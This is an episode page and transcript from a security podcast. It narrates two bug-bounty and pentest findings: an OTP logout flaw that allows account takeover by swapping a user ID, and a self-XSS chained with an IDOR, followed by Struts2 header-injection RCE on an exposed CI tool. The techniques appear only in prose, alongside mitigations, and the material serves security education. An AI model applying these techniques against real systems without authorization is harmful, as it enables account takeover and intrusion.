
Hacked & Secured: Pentest Exploits & Mitigations
If you know how attacks work, you’ll know exactly where to look—whether you’re breaking in as an ethical hacker or defending as a blue teamer.
Hacked & Secured: Pentest Exploits & Mitigations breaks down real-world pentest findings, exposing how vulnerabilities were discovered, exploited, and mitigated.
Each episode dives into practical security lessons, covering attack chains and creative exploitation techniques used by ethical hackers. Whether you're a pentester, security engineer, developer, or blue teamer, you'll gain actionable insights to apply in your work.
🎧 New episodes every month.
🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram, Website Link
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us → podcast@quailu.com.au
Hacked & Secured: Pentest Exploits & Mitigations
Ep. 8 – OTP Flaw & Remote Code Execution: When Small Flaws Go Critical
A broken logout flow let attackers hijack accounts using just a user ID.
A self-XSS and an IDOR exposed stored data. And a forgotten internal tool—running outdated software—ended in full Remote Code Execution.
This episode is all about how small bugs, missed checks, and overlooked services can lead to serious consequences.
Chapters:
00:00 - INTRO
01:22 - FINDING #1 - The Logout That Logged You In
07:12 - FINDING #2 - From Signature Field to Shell Access
14:40 - OUTRO
Want your pentest discovery featured? Submit your creative findings through the Google Form in the episode description, and we might showcase your finding in an upcoming episode!
🌍 Follow & Connect → LinkedIn, YouTube, Twitter, Instagram
📩 Submit Your Pentest Findings → https://forms.gle/7pPwjdaWnGYpQcA6A
📧 Feedback? Email Us → podcast@quailu.com.au
🔗 Podcast Website → Website Link
INTRO
What if logging out of an application didn’t end your session—but logged you into someone else’s account?
And what if a series of low-impact bugs, like self-XSS and IDOR, could be chained to target other users—while persistence and a second look at your recon led to a full remote code execution on a forgotten internal tool?
I’m Amin Malekpour, and you’re listening to Hacked & Secured: Pentest Exploits & Mitigations.
Today’s episode is all about how quiet bugs and overlooked endpoints can escalate fast when tested creatively.
And just a heads-up—we’re moving to a monthly schedule. From now on, new episodes will drop on the last Friday of every month.
That gives us more time to go deeper into each story, feature more community submissions, and bring you even better content.
Alright, let’s dive into today’s episode.
FINDING #1 - The Logout That Logged You In
You’re just trying to log out. You tap the button, and that’s it—the session ends.
But behind the scenes, the app sends a request to the server that says, “Hey, this user wants to log out.”
Now usually, the server just closes your session and confirms you’re signed out.
But in this case… something strange happened.
The logout request didn’t just end the session. It accidentally gave the attacker access to someone else’s account.
This is exactly what korniltsev discovered on HackerOne—a critical authentication flaw in a login system that used OTP, or one-time passwords, to sign users in and out.
And with just one change in the logout request, the attacker could log in as any user.
Now let me slow this down for anyone new to OTP or passwordless systems.
Some apps don’t ask for your password when you log in.
Instead, they send you a one-time login link—maybe to your email or your phone—and all you have to do is tap it. No password needed.
These are called one-tap login systems, or passwordless login flows. They’re designed to be fast and easy, especially on mobile apps.
But here’s the problem. If the server trusts the wrong data—like a user ID sent from the phone—things can go very wrong.
Let me explain it this way.
Imagine a parking attendant at a hotel.
You walk up and say, “Hey, I’m car number 42. I’m ready to leave.”
And without checking who you are, the attendant hands you the keys to car number 42.
That’s what this bug did.
The attacker sent a logout request to the server. But instead of their own user ID, they inserted the user ID of someone else—someone they wanted to impersonate.
And the server replied, “Alright, here’s a fresh login token for that user.”
No validation. No check. Just “Okay, you must be them.”
That single mistake gave the attacker full access to another user’s account.
No password, no phishing. Just a change to one field.
Now let’s go step by step and break down exactly how the attacker discovered this.
The researcher started by logging into their own test account. While watching the traffic, they noticed that the logout request sent to the server included a user_id parameter. The logout worked fine when that value matched their actual session.
But here’s where things got interesting.
They modified that user ID to someone else’s—just a random ID they had grabbed through another part of the app, like a friend list or a shared reference. Then they sent the logout request again… but with the victim’s ID.
And what came back?
A successful response… with a brand new OTP token, but this time, for the victim’s account.
No validation. No error. Just a token for someone else.
They copied that token and plugged it into the normal login flow—submitting it along with the victim’s username—and it worked. The server returned a full session. They were now logged in as the victim.
And here’s the scariest part: there were no unusual tricks involved. They didn’t brute force anything, didn’t crack any tokens, didn’t bypass anything obvious. The server just… trusted the wrong thing.
Now let’s pause here for a second.
You’re doing a pentest. You find a logout request that includes a user ID. What’s your move?
Do you change it and replay the request? Do you see what the server sends back?
Because this is where attacker mindset matters. Most people wouldn’t think to test logout endpoints. But great pentesters do.
They know that authentication is often weakest not at the start or the end—but in the transition between steps.
And believe it or not—this kind of vulnerability can still show up in modern apps.
Especially ones that rely on magic links, one-tap login flows, or federated identity, where the frontend handles most of the interaction, and the backend gets lazy about validating identity at every step.
Anywhere a token is issued without double-checking who requested it, there’s a risk of the same kind of session confusion.
Now if you're designing these systems—if you're the one writing the backend or deciding what needs to be validated—here’s what you should’ve done differently.
- Never trust user-controlled identifiers when issuing or revoking sessions. Always validate that the user ID in the request matches the session that made the request.
- And don’t treat logout as a low-risk endpoint. If it triggers a new token or updates the session state, it should be treated with the same level of caution as login.
This whole bug happened because the backend assumed the client was being honest.
And that’s where most design-level failures begin—not with broken cryptography, but with broken trust.
Alright, fellow pentesters—here’s how you find vulnerabilities like this in your daily engagements.
- When you’re testing login and logout flows, slow them down. Watch for any step that takes user input and turns it into a token, a redirect, or a session update.
- If you see something like a user ID being passed in a request, try changing it.
If the server gives you a different user’s session or returns a successful response… you’ve found the opening.
This wasn’t about bypassing authentication logic with code injection or manipulating cookies. It was just a quiet little parameter… that no one was watching. And that’s exactly where attackers look.
FINDING #2 - From Signature Field to Shell Access
We started this episode with a single parameter in a logout request… that gave attackers full access to any user account.
But some pentests go even deeper.
What starts as a small bug in one feature suddenly leads you somewhere else—a new discovery, a new system, a whole new level of impact.
This next finding is exactly that.
It was reported by Rogerio Resende in a Medium.com blog post. He was working as part of a collaborative pentest team, where each person tackled different parts of the application.
Right from the start, one of his teammates was finding Insecure Direct Object References -IDORs - in several parts of the application.
At the same time, Rogerio focused on the front-end and started testing for cross-site scripting.
And that’s where the first discovery happened.
There was a user setting where people could update their email signature—just a basic form field. Rogerio dropped in a test payload to see if it would reflect unsanitized input.
The app was stripping out script tags. So his first attempt was blocked.
But he didn’t stop.
Instead, he created a slightly obfuscated payload—by breaking up the word "script" using partial tags and nested brackets. Something like closing and reopening HTML tags mid-word so the filter couldn’t catch it properly.
And that worked.
The app filtered some parts, but what was left reassembled into a working script tag—triggering a self-XSS.
Now, a self-XSS by itself isn’t serious. It only runs when the attacker triggers it in their own browser.
But here’s where things get clever.
Rogerio knew that his teammate had found an IDOR—one that let them update another user’s signature field.
So they combined the two.
Use the IDOR to overwrite another user’s signature, and include the XSS payload.
Now the moment that user opens their settings? The payload runs silently in their browser.
That’s the kind of attacker thinking that takes a basic finding and turns it into something real.
But Rogerio didn’t stop there.
Toward the end of the engagement, he went back to his initial nmap scan results. Just reviewing the work—looking at open ports again—and that’s when he spotted something unusual.
A web service on a non-standard port.
When he opened it in the browser, it looked like a really old CI/CD tool interface. One of those legacy admin panels no one wants to maintain… but it was publicly accessible.
Now here’s where his discipline stands out.
That server wasn’t listed in the pentest scope. So instead of poking around, he paused the test and contacted the client.
They confirmed it was okay to test—and he went ahead.
He pointed Burp Suite at it and ran a quick Active Scan, using the Active Scan extension.
And the results came back with something big.
The server was running a vulnerable version of Apache Struts2—a framework known for high-impact Remote Code Execution vulnerabilities.
To confirm, Rogerio crafted a simple test payload based on a known exploit for a Struts2 file upload bug.
This vulnerability worked by injecting special syntax into HTTP headers like Content-Type. If the server mishandled the input, it would treat part of the header as executable code.
So instead of sending a normal value like “application/json” as the Content-Type, the attacker could insert something like # cmd=whoami inside the header.
Rogerio ran the test—and the server responded with output from the whoami command.
That was it.
Remote Code Execution confirmed on a publicly exposed system.
Now pause and think about this.
At the beginning of the test, they found a self-XSS. Then they chained it with an IDOR to make it impactful.
And after all that, when most people would’ve submitted the report and moved on—Rogerio went back, reviewed his old recon, found something suspicious, double-checked the scope, and ended the engagement with a critical RCE.
That’s how real pentests unfold.
You don’t always get a perfect chain from start to finish. Sometimes your best finding shows up at the very end—because you were patient and curious.
And yes—this kind of RCE vulnerability still shows up in the wild.
There are still internal apps, staging systems, forgotten dashboards running vulnerable versions of frameworks like Struts, Jenkins, or Spring.
They often fly under the radar because no one remembers they exist until a pentester or an attacker finds them.
So what went wrong here?
- First, the CI/CD tool should never have been exposed to the internet.
- Second, the Struts2 version should’ve been updated years ago—this vulnerability was publicly documented and exploited in the wild.
- And third—there should’ve been a system in place to flag legacy services before they ever made it into production-facing infrastructure. If your organisation doesn’t know which services are exposed, attackers will find them before you do.
For those of you who are building or designing applications, here’s how this kind of issue can be prevented.
- Start by keeping a clear inventory of every system that is exposed. If you don’t know it’s online, you can’t defend it.
- Always keep your frameworks up to date—especially the ones like Struts that have a long history of critical vulnerabilities.
- And never leave internal tools or admin panels open to the internet. And if you absolutely have to, make sure they’re properly hardened, monitored, and locked behind strict access controls.
These aren’t complex fixes. But if they’re missed, the consequences can be huge.
Alright if you’re a pentester, here’s what to take away from this.
- Always go back to your recon. Don’t trust that every IP or port was tested properly on day one. Look at the full picture. Review your scans. Revisit low-priority items. You might find something there that others missed.
- Keep an eye out for outdated libraries and frameworks. If you spot something like an old version of Struts or Spring, don’t ignore it—go research the known CVEs. You might already have a working exploit without realising it.
- Also—don’t underestimate “weak” bugs like self-XSS. With the right second vulnerability—like an IDOR—they can become powerful.
- And finally—know when to ask for scope clarification. That one email to the client? It led to the highest-impact finding of the whole pentest.
Always remember, pentesting isn’t about fancy tools or lucky guesses—it’s about staying curious, spotting what others miss, and knowing that even one overlooked detail can lead to a critical finding. So stay sharp, keep learning, and always dig a little deeper—because that next discovery might be just one payload away.
OUTRO
Every issue we explored today started with something small—a logout request, a signature field, a forgotten port.
But they all led to serious impact: account takeover, stored XSS, and unauthenticated remote code execution.
And none of these would’ve been fixed without creative thinking, persistence, and responsible disclosure.
If this episode helped you learn something new, share it with one or two people who’d find it useful. Maybe someone who is building backend auth flows, reviewing legacy systems, or testing bugs that seem small at first. This might be the one episode that helps them catch an issue before it turns into something serious.
Let’s make cybersecurity knowledge accessible to all. See you in the next episode.